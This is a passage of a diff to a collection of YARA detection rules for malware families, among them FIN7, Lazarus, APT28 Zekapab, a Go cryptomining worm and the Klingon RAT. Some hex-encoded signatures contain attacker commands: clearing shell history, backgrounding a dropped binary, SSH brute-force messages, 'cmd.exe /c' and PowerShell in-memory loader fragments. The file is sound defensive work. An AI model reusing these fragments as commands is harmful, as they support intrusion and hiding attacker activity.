24 20 00 00 00 00 ff 15 10 [2] 10 85 c0 0f 85 ?? 01 00 00 8d 4c 24 0c 8d 54 24 20 51 52 8b 1d 00 [2] 10 50 68 3f 01 0f 00 50 50 50 8b 44 24 38 68 [2] 03 10 50 ff d3 85 c0 0f 85 ?? 01 00 00 8d 4c 24 0c 8d 54 24 10 51 52 50 68 3f 01 0f 00 50 50 50 8b 44 24 3c 68 [2] 03 10 50 ff d3 85 c0 0f 85 ?? 01 00 00 bf [2] 03 10 83 c9 ff f2 ae f7 d1 2b f9 8d ?? 24 } + $s3 = "%s\\%s\\V5_History.dat" wide + $s4 = { 8b 8c 24 2c 02 00 00 8b 94 24 28 02 00 00 55 57 51 52 8d 44 24 24 53 50 89 74 24 2c e8 05 fb ff ff b9 41 00 00 00 33 c0 8d bc 24 34 01 00 00 83 c4 18 f3 ab 8d 8c 24 1c 01 00 00 51 68 04 01 00 00 ff 15 [2] 03 10 b9 41 00 00 00 33 c0 8d 7c 24 18 50 f3 ab [3] 01 } + $s5 = { 56 6a 10 e8 [3] 00 8b f0 85 f6 74 3a 8b 4c 24 0c 8d 46 04 85 c9 c7 06 [3] 10 c7 00 00 00 00 00 50 74 11 8b 44 24 0c 50 e8 [3] 00 89 46 08 8b c6 5e c3 8b 4c 24 0c 51 e8 [3] 00 89 46 08 8b c6 5e c3 33 } condition: - uint32(0)==0x464c457f and filesize >10KB and 3 of ($seq*) + uint16(0)==0x5A4D and filesize >80KB and 4 of ($s*) } -import "pe" - -rule ARKBIRD_SOLG_APT_NK_Lazarus_Stealer_Screencapture_June_2020_1 : FILE +rule ARKBIRD_SOLG_CRIM_FIN7_PS_Cryptor_Jun_2021_1 : FILE { meta: - description = "Detect ScreenCapture malware used by Lazarus APT" - author = "Arkbird_SOLG, James_inthe_box" - id = "bb0463ac-6219-5a12-b3d2-fc82800bda69" - date = "2020-06-23" - modified = "2021-07-13" - reference = "https://twitter.com/GR_CTI/status/1275164880992186371" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-23/APT_Lazarus_Stealer_June_2020_1.yar#L3-L31" + description = "Detect PS Cryptor used by FIN7 for Diceloader and Carbanak" + author = "Arkbird_SOLG" + id = "26361500-c33e-59c8-a53f-a881966c71a7" + date = "2021-06-07" + modified = "2021-06-07" + reference = "https://twitter.com/z0ul_/status/1401795117678219267" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-07/FIN7/CRIM_FIN7_PS_Cryptor_Jun_2021_1.yara#L1-L28" license_url = "N/A" - logic_hash = "66f8d3da0f70f6c4ed6f853ab4040d7f96c043e9e194f1720999b48910b3e756" + logic_hash = "d7eadaa6dec75ecfa2f03860f41b39dbe9e7ffc9e6ad743497586356301ef67c" score = 75 - quality = 75 + quality = 55 tags = "FILE" - hash1 = "6caa98870efd1097ee13ae9c21c6f6c9202a19ad049a9e65c60fce5c889dc4c8" + hash1 = "944e47dc9da19b753beba173214cdebea2aa3651c402dfacae2dde82c4fdaa43" + hash2 = "fada67a9f89429d6c191cd6fef5d75cd7b49eebaa2e40d1dd1f9884b3038a23b" + hash3 = "0f083aac77fb734a8e81fb9dff218f0414ac6c4c9a23b2832837fbc2c7e2031d" + hash4 = "dc9442838b464e96281a32705c9b5958e4f45dbefd1ef4a885fac9898af0a4b7" + hash5 = "fad295cf65552061dc553c21d89d8bbd0b02783c01f5e696232df6a14381c206" + tlp = "White" + adversary = "FIN7" strings: - $s1 = "E:\\workspace\\VS\\crat_2\\client\\Build\\Win32\\DllRelease\\ScreenCapture_Win32_DllRelease.pdb" fullword ascii - $s2 = "CloseHandle ScreenCaptureMutex failure! %d" fullword ascii - $s3 = "ScreenCapture_Win32_DllRelease.dll" fullword ascii - $s4 = "ScreenCaptureMutex already created! %s\n" fullword ascii - $s5 = "Capturing screen...\n" fullword ascii - $s6 = "%s\\P%02d%lu.tmp" fullword ascii - $s7 = "ScreenCaptureThread finished!" fullword ascii - $s8 = "ScreenCaptureThread started!" fullword ascii - $s9 = "ScreenCapture start time set to %llu" fullword ascii - $s10 = "ScreenCaptureMutex already created! %s\n" fullword ascii - $s11 = "Major=%d, Minor=%d, Build=%d, Arch=%d" fullword ascii - $s12 = "Can't create file %s, errno = %d, nCreateRetryCount = %d" fullword ascii - $s13 = "ExploreDirectory, csDirectoryPath = %s, dwError=%d" fullword ascii - $s14 = "[END] ScreenCaptureThread terminated!" fullword ascii - $s15 = { 25 00 2d 00 32 00 30 00 73 00 20 00 20 00 20 00 25 00 31 00 30 00 6c 00 6c 00 75 00 20 00 62 00 79 00 74 00 65 00 73 } - $s16 = { 57 00 72 00 6f 00 74 00 65 00 20 00 25 00 64 00 20 00 62 00 79 00 74 00 65 00 73 00 20 00 74 00 6f 00 20 00 66 00 69 00 6c 00 65 00 20 00 25 00 73 } - $s17 = "Entered Windows direcotry, skipping..." fullword ascii - $s18 = "Found %d entries." fullword ascii + $s1 = { 3d 4e 65 77 2d 4f 62 6a 65 63 74 20 49 4f 2e 43 6f 6d 70 72 65 73 73 69 6f 6e 2e 44 65 66 6c 61 74 65 53 74 72 65 61 6d 28 5b 49 4f 2e 4d 65 6d 6f 72 79 53 74 72 65 61 6d 5d 5b 42 79 74 65 5b 5d [6-12] 5b 49 4f 2e 43 6f 6d 70 72 65 73 73 69 6f 6e 2e 43 6f 6d 70 72 65 73 73 69 6f 6e 4d 6f 64 65 5d 3a 3a 44 65 63 6f 6d 70 72 65 73 73 29 } + $s2 = { 40 28 5b 49 6e 74 50 74 72 5d 2c 5b 55 49 6e 74 33 32 5d 2c 5b 55 49 6e 74 33 32 5d 2c 5b 55 49 6e 74 33 32 5d 29 28 5b 49 6e 74 50 74 72 5d 29 } + $s3 = { 2c 20 24 6e 75 6c 6c 2c 20 5b 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 2e 43 61 6c 6c 69 6e 67 43 6f 6e 76 65 6e 74 69 6f 6e 73 5d 3a 3a 41 6e 79 2c 20 40 28 28 4e 65 77 2d 4f 62 6a 65 63 74 20 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 48 61 6e 64 6c 65 52 65 66 29 2e 47 65 74 54 79 70 65 28 29 2c 20 5b 73 74 72 69 6e 67 5d 29 2c 20 24 6e 75 6c 6c } + $s4 = { 5b 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 4d 61 72 73 68 61 6c 5d 3a 3a 47 65 74 44 65 6c 65 67 61 74 65 46 6f 72 46 75 6e 63 74 69 6f 6e 50 6f 69 6e 74 65 72 28 } + $s5 = { 2c 20 24 6e 75 6c 6c 2c 20 5b 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 2e 43 61 6c 6c 69 6e 67 43 6f 6e 76 65 6e 74 69 6f 6e 73 5d 3a 3a 41 6e 79 2c 20 40 28 5b 73 74 72 69 6e 67 5d 29 2c 20 24 6e 75 6c 6c 29 } + $s6 = { 5b 41 70 70 44 6f 6d 61 69 6e 5d 3a 3a 43 75 72 72 65 6e 74 44 6f 6d 61 69 6e 2e 47 65 74 41 73 73 65 6d 62 6c 69 65 73 28 29 20 7c 20 57 68 65 72 65 2d 4f 62 6a 65 63 74 20 7b 20 24 5f 2e 47 6c 6f 62 61 6c 41 73 73 65 6d 62 6c 79 43 61 63 68 65 20 2d 41 6e 64 20 24 5f 2e 4c 6f 63 61 74 69 6f 6e 2e 53 70 6c 69 74 28 27 5c 5c 27 29 5b 2d 31 5d 2e 45 71 75 61 6c 73 28 28 } + $s7 = { 2c 20 5b 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 2e 43 61 6c 6c 69 6e 67 43 6f 6e 76 65 6e 74 69 6f 6e 73 5d 3a 3a 53 74 61 6e 64 61 72 64 2c } + $s8 = { 5b 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 48 61 6e 64 6c 65 52 65 66 5d 28 4e 65 77 2d 4f 62 6a 65 63 74 20 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 48 61 6e 64 6c 65 52 65 66 28 24 } + $s9 = { 3d 5b 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 4d 61 72 73 68 61 6c 5d 3a 3a 47 65 74 44 65 6c 65 67 61 74 65 46 6f 72 46 75 6e 63 74 69 6f 6e 50 6f 69 6e 74 65 72 28 24 } + $s10 = { 5b 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 4d 61 72 73 68 61 6c 5d 3a 3a 43 6f 70 79 28 24 } + $s11 = { 3d 5b 49 6e 74 50 74 72 5d 3a 3a 5a 65 72 6f } condition: - uint16(0)==0x5a4d and filesize <80KB and 14 of them + filesize >40KB and 8 of ($s*) } -import "pe" - -rule ARKBIRD_SOLG_APT_NK_Lazarus_Stealer_Keylog_June_2020_1 : FILE +rule ARKBIRD_SOLG_MAL_ELF_Go_Worm_Jul_2021_1 : FILE { meta: - description = "Detect keylog malware used by Lazarus APT" - author = "Arkbird_SOLG, James_inthe_box" - id = "dd6aae8c-76d1-514d-905e-21472eb9b9b2" - date = "2020-06-23" - modified = "2021-07-13" - reference = "https://twitter.com/GR_CTI/status/1275164880992186371" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-23/APT_Lazarus_Stealer_June_2020_1.yar#L33-L58" + description = "Detect the worm written in Go that drops XMRig Miner" + author = "Arkbird_SOLG" + id = "6f4a9d3a-e038-5d7f-9c18-c380a0b295d2" + date = "2021-07-06" + modified = "2021-07-06" + reference = "https://twitter.com/JAMESWT_MHT/status/1409848815948111877" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-06/MAL_ELF_Go_Worm_Jul_2021_1.yara#L1-L22" license_url = "N/A" - logic_hash = "9a4e17903ad2a7c80651aa8f3d57876d1621be06ba7a683135b11929b232b2fa" + logic_hash = "be8b95f8aab62d3a2b3376a0481ebc609afcd089e0613d39f258e07366b708a1" score = 75 - quality = 75 + quality = 61 tags = "FILE" - hash1 = "6d461bf3e3ca68b2d6d850322b79d5e3e647b0d515cb10449935bf6d77d7d5f2" + hash1 = "774ccd1281b02bc9f0c7e7185c424a42cd98bcc758c893e8a96dfb206a02fcbe" + hash2 = "bea5a4358184555924ab6c831bf34edf279f4b93d750d5321263439dcf9c245a" + tlp = "White" + adversary = "-" strings: - $s1 = "E:\\workspace\\VS\\crat_2\\client\\Build\\Win32\\DllRelease\\KeyLog_Win32_DllRelease.pdb" fullword ascii - $s2 = "CloseHandle KeyLogMutex failure! %d" fullword ascii - $s3 = "KeyLog_Win32_DllRelease.dll" fullword ascii - $s4 = "Key Log Mutex already created! %s\n" fullword ascii - $s5 = "Unable to GetProcAddress of GetAsyncKeyState" fullword ascii - $s6 = "KeyLogThread finished!" fullword ascii - $s7 = "KeyLogThread started!" fullword ascii - $s8 = "Major=%d, Minor=%d, Build=%d, Arch=%d" fullword ascii - $s9 = "Can't create file %s, errno = %d, nCreateRetryCount = %d" fullword ascii - $s10 = "ExploreDirectory, csDirectoryPath = %s, dwError=%d" fullword ascii - $s11 = "[END] KeyLogThread terminated!" fullword ascii - $s12 = { 25 00 2d 00 32 00 30 00 73 00 20 00 20 00 20 00 25 00 31 00 30 00 6c 00 6c 00 75 00 20 00 62 00 79 00 74 00 65 00 73 } - $s13 = { 57 00 72 00 6f 00 74 00 65 00 20 00 25 00 64 00 20 00 62 00 79 00 74 00 65 00 73 00 20 00 74 00 6f 00 20 00 66 00 69 00 6c 00 65 00 20 00 25 00 73 } - $s14 = "Entered Windows direcotry, skipping..." fullword ascii - $s15 = "Found %d entries." fullword ascii + $s1 = { 57 6f 72 6b 65 72 3a 20 28 25 64 29 2c 20 43 68 65 63 6b 20 49 50 28 25 73 29 20 77 69 74 68 20 53 53 48 20 70 6f 72 74 20 69 73 20 6f 70 65 6e 2e 2e 2e } + $s2 = { 63 61 74 20 2f 64 65 76 2f 6e 75 6c 6c 20 3e 20 7e 2f 2e 62 61 73 68 5f 68 69 73 74 6f 72 79 20 26 26 20 68 69 73 74 6f 72 79 20 2d 63 } + $s3 = { 6e 6f 68 75 70 20 2e 2f 25 73 20 26 3e 20 6d 79 73 71 6c 6c 6f 67 73 20 26 } + $s4 = { 72 6d 20 2d 66 20 25 73 20 6d 79 73 71 6c 6c 6f 67 73 } + $s5 = { 63 6f 6d 6d 61 6e 64 20 2d 76 20 62 61 73 68 } + $s6 = { 53 74 6f 70 20 62 72 75 74 65 20 6f 6e 2c 20 57 6f 72 6b 65 72 3a 20 28 25 64 29 2c 20 54 72 79 3a 20 49 50 3a 20 25 73 2c 20 63 72 65 64 65 6e 74 69 61 6c 3a 20 25 73 2f 25 73 20 28 25 64 2f 25 64 29 3a 20 44 55 52 41 54 49 4f 4e 3a 20 25 66 } + $s7 = { 57 6f 72 6b 65 72 3a 20 28 25 64 29 2c 20 54 72 79 3a 20 49 50 3a 20 25 73 2c 20 63 72 65 64 65 6e 74 69 61 6c 3a 20 25 73 2f 25 73 20 28 25 64 2f 25 64 29 } condition: - uint16(0)==0x5a4d and filesize <80KB and 11 of them + uint32(0)==0x464c457f and filesize >900KB and all of ($s*) } import "pe" -rule ARKBIRD_SOLG_APT_NK_Lazarus_Stealer_Generic_June_2020_1 : FILE +rule ARKBIRD_SOLG_APT28_Zekapab_June_2020_1 : FILE { meta: - description = "Detect stealers used by Lazarus APT by common strings" - author = "Arkbird_SOLG, James_inthe_box" - id = "11a7c531-91a4-524e-aa5d-c11538f7db58" - date = "2020-06-23" - modified = "2021-07-13" - reference = "https://twitter.com/GR_CTI/status/1275164880992186371" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-23/APT_Lazarus_Stealer_June_2020_1.yar#L60-L85" + description = "Detect Delphi variant of Zekapab" + author = "Arkbird_SOLG" + id = "cf87e67f-2db9-537d-8800-8cd47b47c276" + date = "2020-06-28" + modified = "2020-06-28" + reference = "https://twitter.com/DrunkBinary/status/1276573779037163520" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-28/APT28_Zekapab_June_2020_1.yar#L3-L29" license_url = "N/A" - logic_hash = "878e4a128b7de45f4940e7adccfeb376ce46e87b35b25e162f668303e9fd7852" + logic_hash = "a02a78b8f60cf9d4441cc18b70fd00ec89253a5feafdc0eb392486b575bc61e2" score = 75 - quality = 75 + quality = 25 tags = "FILE" - hash1 = "6d461bf3e3ca68b2d6d850322b79d5e3e647b0d515cb10449935bf6d77d7d5f2" - hash2 = "6caa98870efd1097ee13ae9c21c6f6c9202a19ad049a9e65c60fce5c889dc4c8" + hash1 = "12879b9d8ae046ca2f2ebcc7b1948afc44e6e654b7f4746e7a5243267cfd7c46" strings: - $s1 = "E:\\workspace\\VS\\crat_2\\client\\Build\\Win32\\DllRelease" fullword ascii - $s2 = "Mutex failure! %d" fullword ascii - $s3 = "Win32_DllRelease.dll" fullword ascii - $s4 = "Mutex already created! %s\n" fullword ascii - $s5 = "[END]" fullword ascii - $s6 = "Thread finished!" fullword ascii - $s7 = "Thread started!" fullword ascii - $s8 = "Major=%d, Minor=%d, Build=%d, Arch=%d" fullword ascii - $s9 = "Can't create file %s, errno = %d, nCreateRetryCount = %d" fullword ascii - $s10 = "ExploreDirectory, csDirectoryPath = %s, dwError=%d" fullword ascii - $s11 = "Thread terminated!" fullword ascii - $s12 = { 25 00 2d 00 32 00 30 00 73 00 20 00 20 00 20 00 25 00 31 00 30 00 6c 00 6c 00 75 00 20 00 62 00 79 00 74 00 65 00 73 } - $s13 = { 57 00 72 00 6f 00 74 00 65 00 20 00 25 00 64 00 20 00 62 00 79 00 74 00 65 00 73 00 20 00 74 00 6f 00 20 00 66 00 69 00 6c 00 65 00 20 00 25 00 73 } - $s14 = "Entered Windows direcotry, skipping..." fullword ascii + $s1 = "54484520494E535452554354494F4E2041542030783763663538326164205245464552454E434544204D454D4F525920415420307830303030303030302E2054" ascii + $s2 = "Mozilla/3.0 (compatible; Indy Library)" fullword ascii + $s3 = "5C4164646974696F6E735C73616D636C69656E742E657865" ascii + $s4 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontSubstitutes" fullword ascii + $s5 = "\\SYSTEM\\CurrentControlSet\\Control\\Keyboard Layouts\\" fullword ascii + $s6 = "Software\\Borland\\Delphi\\Locales" fullword ascii + $s7 = "SOFTWARE\\Borland\\Delphi\\RTL" fullword ascii + $s8 = "Software\\Borland\\Locales" fullword ascii + $s9 = "FastMM Borland Edition" fullword ascii + $s10 = "#7@Qhq\\1@NWgyxeH\\_bpdgc" fullword ascii + $s11 = "4150504C49434154494F4E204552524F52" ascii + $s12 = "436D442E457865202F6320" ascii + $s13 = "6572726F72" ascii + $s14 = "WndProcPtr" fullword ascii + $s15 = "Request.UserAgent" fullword ascii + $s16 = "ProxyPassword<" fullword ascii condition: - uint16(0)==0x5a4d and filesize <80KB and 11 of them + uint16(0)==0x5a4d and filesize <300KB and (pe.imphash()=="dbdfe8b60c1de0a9201044b3e91b9502" or 12 of them ) } -rule ARKBIRD_SOLG_MAL_Sidoh_Stealer_Aug_2021_1 : FILE +import "pe" + +rule ARKBIRD_SOLG_APT_NK_Lazarus_Implant_June_2020_1 : FILE { meta: - description = "Detect Sidoh Stealer used by RYUK group" + description = "Detect Lazarus implant June 2020" author = "Arkbird_SOLG" - id = "b4661304-6dfa-5c33-95f2-8694271b9e58" - date = "2021-08-31" - modified = "2021-09-01" - reference = "https://www.crowdstrike.com/blog/sidoh-wizard-spiders-mysterious-exfiltration-tool/" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-31/Sidoh/MAL_Sidoh_Stealer_Aug_2021_1.yara#L1-L22" + id = "602c33f2-1e34-5267-9154-ada2d6edc64b" + date = "2020-06-28" + modified = "2020-06-28" + reference = "https://twitter.com/ccxsaber/status/1277064824434745345" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-28/APT_NK_Lazarus_Implant_June_2020_1.yar#L3-L23" license_url = "N/A" - logic_hash = "baeea14c6be42d64d3ca68298bf6ced34c9587fcda91471945cfc7ed1fe267bd" + logic_hash = "29b6b8d3bdd47707854ed0dc00808d6352934950a8e7244450df78422ff3cb15" score = 75 - quality = 75 + quality = 73 tags = "FILE" - hash1 = "a1ce52437252001b56c9ccd2d2da46240dc38db8074a5ed39a396e8c8e387fc2" - hash2 = "c64269a64b64b20108df89c4f1a415936c9d9923f8761d0667aa8492aa057acb" - hash3 = "e6762cb7d09cd90d5469e3c3bfc3b47979cd67aa06c06e893015a87b0348c32c" - hash4 = "cc4a0b4080844e20fb9535679f7b09a3e2449729ce1815d1e5a64272b0225465" - tlp = "White" - adversary = "RYUK (RAAS)" + hash1 = "21afaceee5fab15948a5a724222c948ad17cad181bf514a680267abcce186831" strings: - $s1 = { 68 88 13 00 00 ff 15 ?? 30 41 00 ff 76 04 ff 15 ?? 30 41 00 68 10 27 00 00 53 68 ?? f6 41 00 e8 ?? ?? 00 00 83 c4 0c ff 15 ?? 30 41 00 8b f8 8b f3 8b d7 8b ce d3 ea f6 c2 01 74 34 8d 46 41 6a 3a 66 a3 ?? f6 41 00 58 66 a3 ?? f6 41 00 33 c0 68 ?? f6 41 00 66 a3 ?? f6 41 00 ff 15 ?? 30 41 00 83 f8 05 74 0a b9 ?? f6 41 00 e8 ?? ?? 00 00 46 83 fe 1a 7c bb 68 10 27 00 00 53 68 ?? f6 41 00 e8 ?? ?? 00 00 8b 3d ?? 30 41 00 8d 44 24 28 83 c4 0c 89 5c 24 1c 6a 01 50 53 ff d7 8b 35 ?? 30 41 00 6a 04 68 00 10 00 00 ff 74 24 24 53 ff d6 8b d8 8d 44 24 1c 6a 01 50 53 89 5c 24 30 ff d7 6b 0b 18 6a 04 68 00 10 00 00 51 33 c9 51 ff d6 68 00 40 00 00 6a 40 89 44 24 38 ff 15 ?? 30 41 00 33 f6 89 44 24 2c 89 74 24 } - $s2 = { 8b ca c1 e9 02 f3 a5 8b ca 83 e1 03 f3 a4 33 f6 56 56 56 6a 01 56 ff 15 ?? 31 41 00 a3 ?? ?? 42 00 8b fe 85 c0 74 4e 56 68 00 00 00 08 6a 01 68 ?? ?? 41 00 68 ?? ec 41 00 6a 15 ff 75 f8 50 ff 15 ?? 31 41 00 8b f8 85 ff 74 42 56 6a 02 8d 85 f0 fc ff ff 50 53 57 ff 15 ?? 31 41 00 85 c0 75 0f ff 15 ?? 30 41 00 8b d8 a1 ?? ?? 42 00 eb 08 a1 ?? ?? 42 00 33 db 43 8b 35 ?? 31 41 00 50 ff d6 57 ff d6 8b c3 5f 5e 5b 8b e5 } - $s3 = { 55 8b ec 83 ec 58 53 8b 1d ?? 30 41 00 56 57 6a 04 68 00 10 00 00 6a 02 6a 00 89 55 f0 8b f1 ff d3 8b f8 85 ff 75 08 83 c8 ff e9 0f 01 00 00 56 68 ?? ?? 41 00 57 e8 93 ff ff ff 83 65 f8 00 8d 45 f8 50 6a 00 57 ff 15 ?? 31 41 00 83 c4 18 8b f0 83 7d f8 00 89 75 f4 74 04 6a fd eb 33 83 65 ac 00 8d 45 ac 50 ff 15 ?? 31 41 00 8d 45 ac 50 6a 00 68 ?? ?? 41 00 56 ff 15 ?? 31 41 00 83 c4 14 83 7d c8 00 77 10 72 06 } - $s4 = { 6a 04 68 00 10 00 00 ff 75 c4 6a 00 ff d3 8b d8 85 db 75 1a 68 00 80 00 00 50 57 ff 15 ?? 30 41 00 56 ff 15 ?? 31 41 00 59 6a fb 58 eb 79 6a 00 68 ?? ?? 41 00 56 ff 15 ?? 31 41 00 ff 75 c8 8b f0 ff 75 c4 53 56 ff 15 ?? 31 41 00 56 ff 15 ?? 31 41 00 ff 75 f4 ff 15 ?? 31 41 00 ff 75 08 8b 55 c4 8b cb ff 75 f0 e8 3b 02 00 00 8b f0 83 c4 2c 85 f6 75 14 83 7d 08 05 75 0e 8b 55 c4 51 8b cb e8 b3 09 00 00 59 8b f0 68 00 80 00 00 6a 00 53 ff 15 ?? 30 41 00 68 00 80 00 00 6a 00 57 ff 15 ?? 30 41 00 8b c6 5f 5e 5b 8b e5 } + $s1 = "Upgrade.exe" fullword ascii + $s2 = "ver=%d×tamp=%lu" fullword ascii + $s3 = "_update.php" fullword ascii + $s4 = "Dorusio Wallet 2.1.0 (Check Update Windows)" fullword wide + $s5 = "Content-Type: application/x-www-form-urlencoded" fullword ascii + $s6 = "CONOUT$" fullword ascii + $s7 = "D$8fD;i" fullword ascii + $s8 = "WinHttpOpenRequest" fullword ascii + $s9 = "HTTP/1.0" fullword ascii + $s10 = "POST" fullword ascii condition: - uint16(0)==0x5A4D and filesize >20KB and all of ($s*) + uint16(0)==0x5a4d and filesize <30KB and (pe.imphash()=="565005404f00b7def4499142ade5e3dd" or 6 of them ) } rule ARKBIRD_SOLG_Ran_Conti_Loader_V3_Nov_2020_1 : FILE { @@ -199379,479 +201238,563 @@ rule ARKBIRD_SOLG_Ran_Conti_V3_Nov_2020_1 : FILE condition: uint16(0)==0x5a4d and filesize >80KB and all of ($seq*) } -rule ARKBIRD_SOLG_RAN_Nemty_June_2021_1 : FILE +rule ARKBIRD_SOLG_MAL_Klingon_Jun_2021_1 : FILE { meta: - description = "Detect Nemty ransomware" + description = "Detect the Klingon RAT" author = "Arkbird_SOLG" - id = "1c7994b8-7479-5679-91a5-e3ca4b2e7fde" - date = "2021-06-12" - modified = "2021-06-13" - reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-12/Nemty/RAN_Nemty_June_2021_1.yara#L1-L19" + id = "bf114c4d-3010-5b34-954e-82794e30edcb" + date = "2021-06-19" + modified = "2021-06-21" + reference = "https://www.intezer.com/blog/malware-analysis/klingon-rat-holding-on-for-dear-life/" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-20/Klingon/MAL_Klingon_Jun_2021_1.yara#L1-L18" license_url = "N/A" - logic_hash = "25a9e82ae1e950e1c71d6dfa120efd1a2ba39cbf8e9c2cd4ba4e67ce7dabc45e" + logic_hash = "283452d24edea988dc353fada4cd1e050db244a48cc6ab30f70e1900ca9c7c2f" score = 75 quality = 75 tags = "FILE" - hash1 = "45e35c9b095871fbc9b85afff4e79dd36b7812b96a302e1ccc65ce7668667fe6" - hash2 = "511fee839098dfa28dd859ffd3ece5148be13bfb83baa807ed7cac2200103390" - hash3 = "74b7a1da50ce44b640d84422bb3f99e2f338cc5d5be9ef5f1ad03c8e947296c3" - tlp = "white" - adversary = "RAAS" + hash1 = "44237e2de44a533751c0baace09cf83293572ae7c51cb4575e7267be289c6611" + hash2 = "c98bb0649262277ec9dd16cf27f8b06042ff552535995f2bdd3355d2adeff801" + hash3 = "e8eea442e148c81f116de31b4fc3d0aa725c5dbbbd840b446a3fb9793d0b9f26" + tlp = "White" + adversary = "-" strings: - $s1 = { 83 f8 1a 0f 8d [2] 00 00 [0-1] 89 4c 24 [1-2] 89 54 24 [1-2] 89 ?? 24 [1-15] 00 00 00} - $s2 = { 5a 4c 49 42 00 00 00 00 00 00 01 ?? 78 01 54 8f [3] 40 [2] cf } - $s3 = { 4c 24 [1-2] 89 54 24 [1-2] 89 ?? 24 [12-25] 00 81 } - $s4 = { ff ff [0-1] 8d 05 [3] 00 [0-1] 89 04 24 [0-1] c7 44 24 ?? 02 00 00 00 e8 [2] ff ff e8 [2] ff ff [0-1] 8b 4c 24 } + $seq1 = { 81 3a 70 72 6f 78 0f 85 [2] 00 00 80 7a 04 79 0f 84 [2] 00 00 48 83 f9 05 75 12 81 3a 73 68 65 6c 75 0a 80 7a 04 6c 0f 84 [2] 00 00 48 83 f9 06 75 14 81 3a 62 69 6e 61 75 0c 66 81 7a 04 72 79 0f 84 [2] 00 00 48 83 f9 03 0f 85 ?? 04 00 00 66 81 3a 63 6d 0f 85 [2] 00 00 80 7a 02 64 0f 84 [2] 00 00 48 83 f9 06 } + $seq2 = { 48 8d 05 [3] 00 48 89 ?? 24 [1-4] 48 c7 84 24 ?? 00 00 00 ?? 00 00 00 48 8d 0d [3] 00 48 89 ?? 24 [0-4] 48 c7 ?? 24 } + $seq3 = { 48 8d 0d [3] 00 48 89 8c 24 ?? 00 00 00 48 8b 94 24 ?? 00 00 00 48 89 94 24 ?? 00 00 00 48 89 8c 24 ?? 00 00 00 48 8b 94 24 ?? 00 00 00 48 89 94 24 ?? 00 00 00 48 89 8c 24 ?? 00 00 00 48 89 84 24 ?? 00 00 00 48 8d 05 [3] 00 48 89 04 24 48 c7 44 24 08 08 00 00 00 48 8d 84 24 ?? 00 00 00 48 89 44 24 10 48 c7 44 24 18 03 00 00 00 48 c7 44 24 20 03 00 00 00 e8 [3] ff 48 8b 44 24 30 48 89 44 24 58 48 8b 4c 24 28 48 89 8c 24 ?? 00 00 00 } condition: - uint16(0)==0x5a4d and filesize >500KB and all of ($s*) + uint16(0)==0x5a4d and filesize >300KB and all of ($seq*) } -rule ARKBIRD_SOLG_APT_APT34_RDAT_July_2021_1 : FILE +rule ARKBIRD_SOLG_MAL_Milum_Jul_2021_1 : FILE { meta: - description = "Detect RDAT used by APT34" + description = "Detect Milum malware" author = "Arkbird_SOLG" - id = "136f8a9e-e680-5fab-8113-b4d33a47bc34" - date = "2021-07-15" - modified = "2021-07-16" - reference = "https://twitter.com/ShadowChasing1/status/1415206437806960647" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-15/APT34/APT_APT34_RDAT_July_2021_1.yara#L1-L22" + id = "ba1cc56e-f6da-57db-a773-4823ae343e31" + date = "2021-07-08" + modified = "2021-07-08" + reference = "https://securelist.com/wildpressure-targets-macos/103072/" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-08/WildPressure/MAL_Milum_Jul_2021_1.yara#L1-L33" license_url = "N/A" - logic_hash = "269788430ca8faff4b0ea5ec7c2a62f99f5f48ef3bc4ea3f7a27f1d735e64819" + logic_hash = "4321051fdc9ab5f4ee12c4b505e4271df89b489067875eaf3d2cb670815f7e37" score = 75 quality = 75 tags = "FILE" - hash1 = "b59dea96ef94e8d32ee1a1805174318643569bbdca0d7569ede19467ff09dcdc" - hash2 = "65a6afc027ff851bd325d8a4f2ab4f326dd8f2c230bfd49a213c5afc00df8e2c" - hash3 = "f9f6dbb09773f708b125a4cca509047eb33c8c53d9e15a8c41ae3d7a8c3e5c7c" + hash1 = "7eafb957c2e715e06489a979a185f75d7a9d502223c8aba36e7b6b8ead7d03b2" + hash2 = "86456ebf6b807e8253faf1262e7a2b673131c80174f6133b253b2e5f0da442a9" + hash3 = "5e0226f37b861876ec38e4a1564a26e4af3022d869375bc0f09b8feea4cd9e1b" tlp = "White" - adversary = "APT34" + 